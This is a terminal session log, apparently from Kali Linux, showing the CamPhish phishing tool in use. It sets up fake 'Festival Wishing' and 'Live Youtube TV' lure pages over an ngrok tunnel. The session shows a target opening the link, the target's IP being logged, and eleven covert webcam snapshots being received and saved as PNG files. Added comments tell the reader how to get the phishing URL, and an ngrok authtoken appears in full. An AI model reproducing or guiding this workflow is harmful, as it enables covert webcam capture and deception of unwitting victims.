 ┌──(root㉿kali)-[~]
└─# ls
CamPhish  etc
                                                                                                                   
┌──(root㉿kali)-[~]
└─# cd CamPhish/                                         
                                                                                                                   
┌──(root㉿kali)-[~/CamPhish]
└─# 
                                                                                                                   
┌──(root㉿kali)-[~/CamPhish]
└─# ls
camphish.sh          index2.html  ip.php   LiveYTTV.html  OnlineMeeting.html  README.md     template.php
festivalwishes.html  index.php    LICENSE  ngrok          post.php            saved.ip.txt
                                                                                                                   
┌──(root㉿kali)-[~/CamPhish]
└─# bash camphish.sh


 
 
 
  _______  _______  _______  _______          _________ _______          
 (  ____ \(  ___  )(       )(  ____ )|\     /|\__   __/(  ____ \|\     /|
 | (    \/| (   ) || () () || (    )|| )   ( |   ) (   | (    \/| )   ( |
 | |      | (___) || || || || (____)|| (___) |   | |   | (_____ | (___) |
 | |      |  ___  || |(_)| ||  _____)|  ___  |   | |   (_____  )|  ___  |
 | |      | (   ) || |   | || (      | (   ) |   | |         ) || (   ) |
 | (____/\| )   ( || )   ( || )      | )   ( |___) (___/\____) || )   ( |
 (_______/|/     \||/     \||/       |/     \|\_______/\_______)|/     \|
  CamPhish Ver 1.5  
  www.techchip.net | youtube.com/techchipnet  


-----Choose tunnel server----

[01] Ngrok
[02] Serveo.net

[+] Choose a Port Forwarding option: [Default is 1] 1

-----Choose a template----

[01] Festival Wishing
[02] Live Youtube TV
[03] Online Meeting

[+] Choose a template: [Default is 1] 2          

//	Go to the yt link and paste just the last part or code of it 

[+] Enter YouTube video watch ID: IajZTuxdv3Q
[+] Downloading Ngrok...
[+] Enter your valid ngrok authtoken: 2JdJC52iBI3ZobAwfYeb7LyDzuU_6Qpo6CxihYWUmefHdUXiu
[+] Starting php server...
[+] Starting ngrok server...
[*] Direct link: https://f0f7-117-226-218-52.ngrok.io

//	Do not go to this link given above.. go to --> 127.0.0.1:4040/status
//	You will be redirected to ngrok

[*] Waiting targets, Press Ctrl + C to exit...

//	https://f0f7-117-226-218-52.ngrok.io
//	Copy this url from the ngrock website just opened

[+] Target opened the link!
[+] IP: 117.226.160.230



2nd Try success

  _______  _______  _______  _______          _________ _______          
 (  ____ \(  ___  )(       )(  ____ )|\     /|\__   __/(  ____ \|\     /|
 | (    \/| (   ) || () () || (    )|| )   ( |   ) (   | (    \/| )   ( |
 | |      | (___) || || || || (____)|| (___) |   | |   | (_____ | (___) |
 | |      |  ___  || |(_)| ||  _____)|  ___  |   | |   (_____  )|  ___  |
 | |      | (   ) || |   | || (      | (   ) |   | |         ) || (   ) |
 | (____/\| )   ( || )   ( || )      | )   ( |___) (___/\____) || )   ( |
 (_______/|/     \||/     \||/       |/     \|\_______/\_______)|/     \|
  CamPhish Ver 1.5  
  www.techchip.net | youtube.com/techchipnet  


-----Choose tunnel server----

[01] Ngrok
[02] Serveo.net

[+] Choose a Port Forwarding option: [Default is 1] 1

-----Choose a template----

[01] Festival Wishing
[02] Live Youtube TV
[03] Online Meeting

[+] Choose a template: [Default is 1] 1

[+] Enter festival name: Diwali

[*] your ngrok authtoken: 2JdJC52iBI3ZobAwfYeb7LyDzuU_6Qpo6CxihYWUmefHdUXiu

[+] Do you want to change your ngrok authtoken? [Y/n]: n
[+] Starting php server...
[+] Starting ngrok server...
[*] Direct link: https://0fc8-117-226-218-52.ngrok.io

[*] Waiting targets, Press Ctrl + C to exit...

[+] Target opened the link!
[+] IP: 117.226.218.52

[+] Cam file received!

[+] Cam file received!

[+] Cam file received!

[+] Cam file received!

[+] Cam file received!

[+] Cam file received!

[+] Cam file received!

[+] Cam file received!

[+] Cam file received!

[+] Cam file received!

[+] Cam file received!
^C
                                                                                                                   
┌──(root㉿kali)-[~/CamPhish]
└─# ls
cam30Dec2022180550.png  cam30Dec2022180557.png  cam30Dec2022180605.png  ip.php              post.php
cam30Dec2022180551.png  cam30Dec2022180559.png  camphish.sh             LICENSE             README.md
cam30Dec2022180553.png  cam30Dec2022180600.png  festivalwishes.html     LiveYTTV.html       saved.ip.txt
cam30Dec2022180554.png  cam30Dec2022180602.png  index2.html             ngrok               template.php
cam30Dec2022180556.png  cam30Dec2022180603.png  index.php               OnlineMeeting.html
                                                                                                                   
┌──(root㉿kali)-[~/CamPhish]
└─# 
                                                                                                                   
┌──(root㉿kali)-[~/CamPhish]
└─# cam30Dec2022180550.png    
.cam30Dec2022180550.png: command not found
                                                                                                                   
┌──(root㉿kali)-[~/CamPhish]
└─# 

